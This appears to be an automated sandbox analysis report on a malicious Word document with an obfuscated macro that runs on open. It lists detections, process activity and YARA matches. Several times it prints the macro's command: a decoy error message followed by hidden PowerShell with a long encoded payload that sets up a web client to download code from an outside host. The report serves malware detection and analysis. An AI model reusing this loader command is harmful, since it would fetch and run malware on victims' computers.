Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 7880
Source: unknownProcess created: Commandline size = 7789
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 7789Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFA16250CD05_2_00007FFA16250CD0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFA16250D305_2_00007FFA16250D30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFA16250D7F5_2_00007FFA16250D7F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFA16250D875_2_00007FFA16250D87
Source: Adjunto K_23165.docOLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentationOLE, VBA macro: Module Ntx3xle2gjt1, Function Document_openName: Document_open
Source: Adjunto K_23165.docOLE indicator, VBA macros: true
Source: 00000005.00000002.345480292.000001924A410000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.340406464.0000019232AD8000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.340509636.0000019232B22000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.341303023.0000019232EE5000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000003.262229379.000001924A61C000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.337081458.00000192305F5000.00000004.00000040.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000003.336047915.000001924A6AB000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.339130346.00000192327E7000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.340312638.0000019232A8D000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.339329271.000001923285D000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.340170127.0000019232A43000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.340568266.0000019232B5B000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.337304488.0000019231EA0000.00000004.00000040.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.340038608.00000192329F8000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.340632134.0000019232B85000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.346005102.000001924A6AB000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000003.335945822.000001924A6BB000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.339894658.00000192329AE000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: classification engineClassification label: mal100.troj.evad.winDOC@7/15@9/6
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{115C999D-9F7F-4C70-9DB6-9BD86E6F1B87} - OProcSessId.datJump to behavior
Source: Adjunto K_23165.docOLE indicator, Word Document stream: true
Source: Adjunto K_23165.docOLE document summary: title field not present or empty
Source: Adjunto K_23165.docOLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Adjunto K_23165.docVirustotal: Detection: 69%
Source: Adjunto K_23165.docMetadefender: Detection: 54%
Source: Adjunto K_23165.docReversingLabs: Detection: 85%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgACQAYwBWAE4AZwBBAFMAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0ARgAgACcAWQBTAFQAZQBNAC4ASQAnACwAJwBTACcALAAnAFIAeQAnACwAJwBPAC4ARABpAHIARQBDAFQAbwAnACkAOwAgACAAIABzAGUAdAAtAEkAVABFAE0AIAAoACIAdgBhAHIAaQBhAEIAbABlACIAKwAiADoAbAA2AFUAIgArACIAWQBIACIAKwAiAE4AIgApACAAIAAoAFsAVABZAHAAZQBdACgAIgB7ADUAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADEAfQAiAC0ARgAgACcAWQAnACwAJwBHAGUAcgAnACwAJwBFAFAAbwBJACcALAAnAE4AdABtACcALAAnAFQARQBNAC4ATgBlAHQALgBzAGUAJwAsACcAcwAnACwAJwBBAG4AQQAnACwAJwBzACcALAAnAFIAdgBJAGMAJwApACkAOwAgACQAWABkAHoAXwB0AF8AaQA9ACgAJwBBAHUAJwArACgAJwB6ADAAegAnACsAJwBxAHgAJwApACkAOwAkAFAAaQBpADgAbwBlAG4APQAkAEIAMAB4AGsAMAA0AHIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFYAYQBsADYAcQBhAHgAOwAkAEwAcgBfAGwAcQBuAHcAPQAoACgAJwBQAGsAJwArACcAOQAnACkAKwAoACcAMQAnACsAJwA1AHcAJwApACsAJwBvACcAKQA7ACAAKAAgACAAaQBUAEUATQAgAHYAYQByAEkAQQBCAGwARQA6AEMAdgBuAGcAQQBTACkALgB2AEEAbABVAEUAOgA6ACIAQwBSAEUAQQBUAGUAYABkAGkAYABSAGUAQwB0AE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AWQAnACsAJwA1ACcAKwAnADUAOQBqAHMAdgB7ADAAfQBJAGUAdwBmAG0AeQAzACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBGAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAE0AXwBkAG4AYgBzADQAPQAoACcAUQAnACsAKAAnAHUAJwArACcAZwBzACcAKQArACgAJwB5AG8AJwArACcAZAAnACkAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAGUAbQAgACgAIgB2AGEAUgBJAGEAQgBMAGUAIgArACIAOgBsADYAdQAiACsAIgBZAEgAIgArACIAbgAiACkAKQAuAHYAYQBMAHUARQA6ADoAIgBzAEUAQwB1AFIAYABJAFQAYAB5AHAAcgBPAFQAYABvAGMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAdABoAHEAbQBnAD0AKAAnAEoAJwArACgAJwB6AHoAJwArACcAegA2ACcAKwAnADIAbQAnACkAKQA7ACQAUQBvAGMAeQBfAGIAZwAgAD0AIAAoACgAJwBQAHAAJwArACcAbgBxACcAKQArACcAOQBqACcAKQA7ACQAWgB5ADcAegA3AGgAZAA9ACgAJwBGAGcAJwArACcAMAA0ACcAKwAoACcAYwBjACcAKwAnAGcAJwApACkAOwAkAEUANQBwAGEAbQA0AGUAPQAoACcAVwBpACcAKwAoACcAMAAnACsAJwA4AGoAJwApACsAJwBhAHkAJwApADsAJABUAHAAZAB1AGUAMwAyAD0AJABIAE8ATQBFACsAKAAoACgAJwBNAFIAUABZACcAKwAnADUANQAnACkAKwAoACcAOQBqACcAKwAnAHMAJwApACsAJwB2ACcAKwAnAE0AJwArACgAJwBSACcAKwAnAFAASQAnACkAKwAnAGUAJwArACgAJwB3AGYAbQAnACsAJwB5ADMAJwApACsAKAAnAE0AUgAnACsAJwBQACcAKQApAC4AIgBSAGUAYABQAEwAYQBDAEUAIgAoACgAJwBNACcAKwAnAFIAUAAnACkALAAnAFwAJwApACkAKwAkAFEAbwBjAHkAXwBiAGcAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFIANgB1AHQAdgB5AGwAPQAoACgAJwBHACcAKwAnAHAAcgAnACkAKwAoACcAcwAnACsAJwA3ADkAJwApACsAJwBqACcAKQA7ACQAWgAxAGYAbQB2AHEAaAA9AE4AYABlAGAAdwAtAE8AQgBKAGUAYABDAFQAIABOAEUAVAAuAHcARQBCAGMAbABJAGUATgB0ADsAJABOAHkANABtAG4AdgB4AD0AKAAoACcAaAAnACsAKAAoACcAdAAnACsAJwB0AHAAOgBxAHEAKQAoACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKABxAHEAJwApACkAKwAnACkAJwArACgAKAAnACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoAG8AcAAnACkAKQArACgAJwBoACcAKwAnAGUAbABpACcAKQArACcAYQAnACsAKAAnAHMAYgAnACsAJwByAGUAJwArACcAdwBlAHIAeQAnACsAJwAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACcAcQAnACsAJwBxACcAKwAoACgAJwApACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAcAAtA
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAYwBWAE4AZwBBAFMAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0ARgAgACcAWQBTAFQAZQBNAC4ASQAnACwAJwBTACcALAAnAFIAeQAnACwAJwBPAC4ARABpAHIARQBDAFQAbwAnACkAOwAgACAAIABzAGUAdAAtAEkAVABFAE0AIAAoACIAdgBhAHIAaQBhAEIAbABlACIAKwAiADoAbAA2AFUAIgArACIAWQBIACIAKwAiAE4AIgApACAAIAAoAFsAVABZAHAAZQBdACgAIgB7ADUAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADEAfQAiAC0ARgAgACcAWQAnACwAJwBHAGUAcgAnACwAJwBFAFAAbwBJACcALAAnAE4AdABtACcALAAnAFQARQBNAC4ATgBlAHQALgBzAGUAJwAsACcAcwAnACwAJwBBAG4AQQAnACwAJwBzACcALAAnAFIAdgBJAGMAJwApACkAOwAgACQAWABkAHoAXwB0AF8AaQA9ACgAJwBBAHUAJwArACgAJwB6ADAAegAnACsAJwBxAHgAJwApACkAOwAkAFAAaQBpADgAbwBlAG4APQAkAEIAMAB4AGsAMAA0AHIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFYAYQBsADYAcQBhAHgAOwAkAEwAcgBfAGwAcQBuAHcAPQAoACgAJwBQAGsAJwArACcAOQAnACkAKwAoACcAMQAnACsAJwA1AHcAJwApACsAJwBvACcAKQA7ACAAKAAgACAAaQBUAEUATQAgAHYAYQByAEkAQQBCAGwARQA6AEMAdgBuAGcAQQBTACkALgB2AEEAbABVAEUAOgA6ACIAQwBSAEUAQQBUAGUAYABkAGkAYABSAGUAQwB0AE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AWQAnACsAJwA1ACcAKwAnADUAOQBqAHMAdgB7ADAAfQBJAGUAdwBmAG0AeQAzACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBGAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAE0AXwBkAG4AYgBzADQAPQAoACcAUQAnACsAKAAnAHUAJwArACcAZwBzACcAKQArACgAJwB5AG8AJwArACcAZAAnACkAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAGUAbQAgACgAIgB2AGEAUgBJAGEAQgBMAGUAIgArACIAOgBsADYAdQAiACsAIgBZAEgAIgArACIAbgAiACkAKQAuAHYAYQBMAHUARQA6ADoAIgBzAEUAQwB1AFIAYABJAFQAYAB5AHAAcgBPAFQAYABvAGMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAdABoAHEAbQBnAD0AKAAnAEoAJwArACgAJwB6AHoAJwArACcAegA2ACcAKwAnADIAbQAnACkAKQA7ACQAUQBvAGMAeQBfAGIAZwAgAD0AIAAoACgAJwBQAHAAJwArACcAbgBxACcAKQArACcAOQBqACcAKQA7ACQAWgB5ADcAegA3AGgAZAA9ACgAJwBGAGcAJwArACcAMAA0ACcAKwAoACcAYwBjACcAKwAnAGcAJwApACkAOwAkAEUANQBwAGEAbQA0AGUAPQAoACcAVwBpACcAKwAoACcAMAAnACsAJwA4AGoAJwApACsAJwBhAHkAJwApADsAJABUAHAAZAB1AGUAMwAyAD0AJABIAE8ATQBFACsAKAAoACgAJwBNAFIAUABZACcAKwAnADUANQAnACkAKwAoACcAOQBqACcAKwAnAHMAJwApACsAJwB2ACcAKwAnAE0AJwArACgAJwBSACcAKwAnAFAASQAnACkAKwAnAGUAJwArACgAJwB3AGYAbQAnACsAJwB5ADMAJwApACsAKAAnAE0AUgAnACsAJwBQACcAKQApAC4AIgBSAGUAYABQAEwAYQBDAEUAIgAoACgAJwBNACcAKwAnAFIAUAAnACkALAAnAFwAJwApACkAKwAkAFEAbwBjAHkAXwBiAGcAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFIANgB1AHQAdgB5AGwAPQAoACgAJwBHACcAKwAnAHAAcgAnACkAKwAoACcAcwAnACsAJwA3ADkAJwApACsAJwBqACcAKQA7ACQAWgAxAGYAbQB2AHEAaAA9AE4AYABlAGAAdwAtAE8AQgBKAGUAYABDAFQAIABOAEUAVAAuAHcARQBCAGMAbABJAGUATgB0ADsAJABOAHkANABtAG4AdgB4AD0AKAAoACcAaAAnACsAKAAoACcAdAAnACsAJwB0AHAAOgBxAHEAKQAoACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKABxAHEAJwApACkAKwAnACkAJwArACgAKAAnACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoAG8AcAAnACkAKQArACgAJwBoACcAKwAnAGUAbABpACcAKQArACcAYQAnACsAKAAnAHMAYgAnACsAJwByAGUAJwArACcAdwBlAHIAeQAnACsAJwAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACcAcQAnACsAJwBxACcAKwAoACgAJwApACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAcAAtACcAKQApACsAKAAnAGkAbgAnACsAJwBjACcAKQArACcAbAAnACsAKAAnAHUAJ
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAYwBWAE4AZwBBAFMAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0ARgAgACcAWQBTAFQAZQBNAC4ASQAnACwAJwBTACcALAAnAFIAeQAnACwAJwBPAC4ARABpAHIARQBDAFQAbwAnACkAOwAgACAAIABzAGUAdAAtAEkAVABFAE0AIAAoACIAdgBhAHIAaQBhAEIAbABlACIAKwAiADoAbAA2AFUAIgArACIAWQBIACIAKwAiAE4AIgApACAAIAAoAFsAVABZAHAAZQBdACgAIgB7ADUAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADEAfQAiAC0ARgAgACcAWQAnACwAJwBHAGUAcgAnACwAJwBFAFAAbwBJACcALAAnAE4AdABtACcALAAnAFQARQBNAC4ATgBlAHQALgBzAGUAJwAsACcAcwAnACwAJwBBAG4AQQAnACwAJwBzACcALAAnAFIAdgBJAGMAJwApACkAOwAgACQAWABkAHoAXwB0AF8AaQA9ACgAJwBBAHUAJwArACgAJwB6ADAAegAnACsAJwBxAHgAJwApACkAOwAkAFAAaQBpADgAbwBlAG4APQAkAEIAMAB4AGsAMAA0AHIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFYAYQBsADYAcQBhAHgAOwAkAEwAcgBfAGwAcQBuAHcAPQAoACgAJwBQAGsAJwArACcAOQAnACkAKwAoACcAMQAnACsAJwA1AHcAJwApACsAJwBvACcAKQA7ACAAKAAgACAAaQBUAEUATQAgAHYAYQByAEkAQQBCAGwARQA6AEMAdgBuAGcAQQBTACkALgB2AEEAbABVAEUAOgA6ACIAQwBSAEUAQQBUAGUAYABkAGkAYABSAGUAQwB0AE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AWQAnACsAJwA1ACcAKwAnADUAOQBqAHMAdgB7ADAAfQBJAGUAdwBmAG0AeQAzACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBGAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAE0AXwBkAG4AYgBzADQAPQAoACcAUQAnACsAKAAnAHUAJwArACcAZwBzACcAKQArACgAJwB5AG8AJwArACcAZAAnACkAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAGUAbQAgACgAIgB2AGEAUgBJAGEAQgBMAGUAIgArACIAOgBsADYAdQAiACsAIgBZAEgAIgArACIAbgAiACkAKQAuAHYAYQBMAHUARQA6ADoAIgBzAEUAQwB1AFIAYABJAFQAYAB5AHAAcgBPAFQAYABvAGMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAdABoAHEAbQBnAD0AKAAnAEoAJwArACgAJwB6AHoAJwArACcAegA2ACcAKwAnADIAbQAnACkAKQA7ACQAUQBvAGMAeQBfAGIAZwAgAD0AIAAoACgAJwBQAHAAJwArACcAbgBxACcAKQArACcAOQBqACcAKQA7ACQAWgB5ADcAegA3AGgAZAA9ACgAJwBGAGcAJwArACcAMAA0ACcAKwAoACcAYwBjACcAKwAnAGcAJwApACkAOwAkAEUANQBwAGEAbQA0AGUAPQAoACcAVwBpACcAKwAoACcAMAAnACsAJwA4AGoAJwApACsAJwBhAHkAJwApADsAJABUAHAAZAB1AGUAMwAyAD0AJABIAE8ATQBFACsAKAAoACgAJwBNAFIAUABZACcAKwAnADUANQAnACkAKwAoACcAOQBqACcAKwAnAHMAJwApACsAJwB2ACcAKwAnAE0AJwArACgAJwBSACcAKwAnAFAASQAnACkAKwAnAGUAJwArACgAJwB3AGYAbQAnACsAJwB5ADMAJwApACsAKAAnAE0AUgAnACsAJwBQACcAKQApAC4AIgBSAGUAYABQAEwAYQBDAEUAIgAoACgAJwBNACcAKwAnAFIAUAAnACkALAAnAFwAJwApACkAKwAkAFEAbwBjAHkAXwBiAGcAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFIANgB1AHQAdgB5AGwAPQAoACgAJwBHACcAKwAnAHAAcgAnACkAKwAoACcAcwAnACsAJwA3ADkAJwApACsAJwBqACcAKQA7ACQAWgAxAGYAbQB2AHEAaAA9AE4AYABlAGAAdwAtAE8AQgBKAGUAYABDAFQAIABOAEUAVAAuAHcARQBCAGMAbABJAGUATgB0ADsAJABOAHkANABtAG4AdgB4AD0AKAAoACcAaAAnACsAKAAoACcAdAAnACsAJwB0AHAAOgBxAHEAKQAoACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKABxAHEAJwApACkAKwAnACkAJwArACgAKAAnACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoAG8AcAAnACkAKQArACgAJwBoACcAKwAnAGUAbABpACcAKQArACcAYQAnACsAKAAnAHMAYgAnACsAJwByAGUAJwArACcAdwBlAHIAeQAnACsAJwAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACcAcQAnACsAJwBxACcAKwAoACgAJwApACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAcAAtACcAKQApACsAKAAnAGkAbgAnACsAJwBjACcAKQArACcAbAAnACsAKAAnAHUAJJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEWindow found: window name: SysTabControl32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000003.336147480.000001924A3A2000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbn source: powershell.exe, 00000005.00000003.336147480.000001924A3A2000.00000004.00000001.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000003.335909907.000001924A3DA000.00000004.00000001.sdmp
Source: Adjunto K_23165.docInitial sample: OLE summary subject = Communications transmit paradigms Liaison Walks Orchestrator Crossroad middleware

Data Obfuscation:

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
Source: Adjunto K_23165.docStream path 'Macros/VBA/T1f2hilsywf9dq' : High number of GOTO operations
Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module T1f2hilsywf9dqName: T1f2hilsywf9dq
PowerShell case anomaly foundShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgACQAYwBWAE4AZwBBAFMAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0ARgAgACcAWQBTAFQAZQBNAC4ASQAnACwAJwBTACcALAAnAFIAeQAnACwAJwBPAC4ARABpAHIARQBDAFQAbwAnACkAOwAgACAAIABzAGUAdAAtAEkAVABFAE0AIAAoACIAdgBhAHIAaQBhAEIAbABlACIAKwAiADoAbAA2AFUAIgArACIAWQBIACIAKwAiAE4AIgApACAAIAAoAFsAVABZAHAAZQBdACgAIgB7ADUAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADEAfQAiAC0ARgAgACcAWQAnACwAJwBHAGUAcgAnACwAJwBFAFAAbwBJACcALAAnAE4AdABtACcALAAnAFQARQBNAC4ATgBlAHQALgBzAGUAJwAsACcAcwAnACwAJwBBAG4AQQAnACwAJwBzACcALAAnAFIAdgBJAGMAJwApACkAOwAgACQAWABkAHoAXwB0AF8AaQA9ACgAJwBBAHUAJwArACgAJwB6ADAAegAnACsAJwBxAHgAJwApACkAOwAkAFAAaQBpADgAbwBlAG4APQAkAEIAMAB4AGsAMAA0AHIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFYAYQBsADYAcQBhAHgAOwAkAEwAcgBfAGwAcQBuAHcAPQAoACgAJwBQAGsAJwArACcAOQAnACkAKwAoACcAMQAnACsAJwA1AHcAJwApACsAJwBvACcAKQA7ACAAKAAgACAAaQBUAEUATQAgAHYAYQByAEkAQQBCAGwARQA6AEMAdgBuAGcAQQBTACkALgB2AEEAbABVAEUAOgA6ACIAQwBSAEUAQQBUAGUAYABkAGkAYABSAGUAQwB0AE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AWQAnACsAJwA1ACcAKwAnADUAOQBqAHMAdgB7ADAAfQBJAGUAdwBmAG0AeQAzACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBGAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAE0AXwBkAG4AYgBzADQAPQAoACcAUQAnACsAKAAnAHUAJwArACcAZwBzACcAKQArACgAJwB5AG8AJwArACcAZAAnACkAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAGUAbQAgACgAIgB2AGEAUgBJAGEAQgBMAGUAIgArACIAOgBsADYAdQAiACsAIgBZAEgAIgArACIAbgAiACkAKQAuAHYAYQBMAHUARQA6ADoAIgBzAEUAQwB1AFIAYABJAFQAYAB5AHAAcgBPAFQAYABvAGMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAn